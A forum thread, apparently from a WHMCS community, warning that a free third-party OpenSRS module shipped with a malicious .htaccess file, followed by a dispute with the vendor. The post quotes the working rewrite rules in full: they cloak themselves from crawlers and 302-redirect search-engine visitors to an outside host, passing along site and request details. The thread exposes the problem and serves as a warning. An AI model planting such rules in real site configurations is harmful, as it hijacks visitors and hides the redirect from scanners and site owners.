HTB Scripts are Shady

[microvb]

Anyone looking at the HTB (HostTheBest) scripts. Please be advised that after forcing "real" information from you for their script, that they contain malicious code.

 

Following was from the .htaccess file inside the "free" version of OpenSRS balance module which the rest was IonCube encoded so who knows what other wonders are hidden inside (of course I did not install simply after finding this nasty little redirect trojan)

 

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\.*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|***axia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://gamecomes.org/cgi-bin/r.cgi?p=10003&i=5340175b&j=333&m=4fe092494f0f51b55fa9cba93e291670&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

 

I have attached their file so Moderators can review and hopefully kick these guys in the butt to clean up their code and release something a bit less malicious --- this looks REALLY bad as it being linked from the Addons section of WHMCS, makes it appear that it was approved in some part by the developers of WHMCS --- which I am sure it wasn't. (*** apparently I can't attach it as I can only upload 97k ... Moderators, please get back to me privately and we can figure out a way to get the file to you so you can see.)

 

Just a reminder to all those using scripts and plugins to CHECK the code before applying anything blindly. Even when it looks like it comes from a legitimate source, you will find the occasionally nasty bugger like this which I am sure probably functions, but is definitely doing things in what would otherwise be your secure server which you do not wish to have done --- making it insecure.

[bear]

This is not a server compromise (and I can confirm it exists in the download), it's a redirect to a referral link if someone/thing arrives via the listed search engines, but not if it's the engine themselves. Date on that file was Jan 10 just like most of the files in the download, so likely in the directory and packaged along with the addon. That does beg the question as to whether or not his server is compromised, however. I'd be concerned in either case.

 

 

Deliberate? I doubt it. If it were, wouldn't you find a way to hide something like this in the encrypted pages (not an htaccess, of course, but something to do this another way, possibly)?

[microvb]

bear:

 

With regards to deliberation, I will agree this is more of an assumption based on history of lack of communication and address of the developer company. As the free version is binary encoded, there is no way to tell for sure what harm may be caused by the scripts contained within, and in particular, this one may even be capable of registering, hijacking dns, or even deleting domains, creating sub-reseller accounts with unlimited permissions, changing the OpenSRS password, and various other potentially destructive tactics related to granting access to OpenSRS alone ---- not to mention the .htaccess redirect function combined with other potential functions in php to ensure the redirect happens and/or the .htaccess is not removed (eg, recreating), and so on. The .htaccess is merely an insight on what danger may lie within the rest of the script.

 

I have cleaned up several website viruses which had such behavior, and the majority of which were eval()'d or document.write() 'd code. Some contained .htacess which did this behavior.

 

I have tried contacting the company (over 1 year now), and no response, so I am not entirely sure what to do in this case. Either way, the proposed function of this module would be nice to see officially integrated so that we know it is done in a safe and secure way. The particular place where the .htaccess file is located in the archive does lead more suspicion towards manual injection rather than automated. As I am sure you are aware, rarely do "attacks" of this nature inject .htaccess into .zip files, and further, when they do propegate, it is usually in every folder which it can write to.

 

I would like to give HTB the benefit of the doubt, however lack of response in this matter, is rather disconcerting. Perhaps this thread may operate as incentive to respond accordingly and/or cleanup the code, however something of this nature, I would be very hestitant to pursue a closed source (binary encoded) script further.

 

On the positive side, I did not see any negative feedback on "the web", however this too could be the result of very heavy SEO strategies.

 

That being said, here is the jotti virus scan results -- http://virusscan.jotti.org/en/scanresult/8095f7f8ad9e33104cc4c2ca80ef401b9e9926b3

 

Lastly, this thread is not intended to bash or demean any company, especially one which is contributing to the community rather it is intended to bring attention to the community and hopefully the developer to ensure that WHMCS servers are run in a safe and secure manner, without internal exploitation or security holes being intentionally added.

[wsa]

My module dont use .htaccess and i nobody email me this kind of problem that I be sell this like nothing. I check with my developer and Opensrs API. About free well you choose to got it free they is a pay version that you can got and very cheap that dont cost to much. 90% my client buy the source doing to the fact that I dont charger to much on the module. If you email me can you provider me the ticket number to I look in to this

[wsa]

ok I see where this file coming from now is of Opensrs file they give me to I talk to opensrs about this why that that is they

[easyhosting]

ok I see where this file coming from now is of Opensrs file they give me to I talk to opensrs about this why that that is they

 

i would say regardless if Opensrs gave this to you, it is you that is distributing this even your your state

 

My module dont use .htaccess

 

so if this is the case then why distribute .htaccess in the zip file if your script dont use .htaccess

[bear]

so if this is the case then why distribute .htaccess in the zip file if your script dont use .htaccess

I'd suggest that's an indication he's not reviewing the files or product before packaging it, and is a serious cause for concern. If that file wasn't noticed, what else has made it's way into it that isn't quite so obvious? This interacts with an account that has domains and money connected to it, not to mention access to the WHMCS back end and all of those connections.

Scary stuff.

[easyhosting]

I'd suggest that's an indication he's not reviewing the files or product before packaging it, and is a serious cause for concern. If that file wasn't noticed, what else has made it's way into it that isn't quite so obvious? This interacts with an account that has domains and money connected to it, not to mention access to the WHMCS back end and all of those connections.

Scary stuff.

 

it is also an indication that he is marketing scripts as if he created them, which if he had created the scripts then why add the .htaccess file in the zip file if not used. I think he is purchasing these scripts and then selling them as his own

[wsa]

First All my script is built my company and now I will personal check all my developer work now to make sure this never happened again and let other developer to look it also.

[easyhosting]

i think he has problems with other scripts as i did some time ago have his monitoring script to set up my own monitoring service, but all this did was send out spam to a point that my server provider suspended the domain, with a view to suspend my whole VPS. which he did not understand why the domain got suspended etc. luckily i have a good releationship with my server provider and i promised to remove the domain

[wsa]

Am sorry but you total wrong that case everybody who bough this script with have the same problem and let drop this move on already

[bear]

all this did was send out spam to a point that my server provider suspended the domain

Wait, you're saying a monitoring script sent spam emails? What was it advertising?

let drop this move on already

It's a serious issue, and dropping it would be a disservice to those that might be affected. Addressing it and making sure everything was cleaned up is a better approach.

[wsa]

I already tell you I be check my developer work to make sure this not happened again and alot developer make bug and they fixed ASAP and move on.

 

About the Monitoring script don't sent spam if that well be case I be got alot email or poster on alot forums.

[starnetwork]

I have the monitor Script under live-uptime.com and It never send any spam messages.

if you got spam messages maybe someone hacker you server and add some file that send out spam or something.

 

but I have the source code edition and I see the code, there is no spam coding, I can tell you that in 100%

you can contact with me if you have any additional questions

 

Best Regards,

StarNetwork.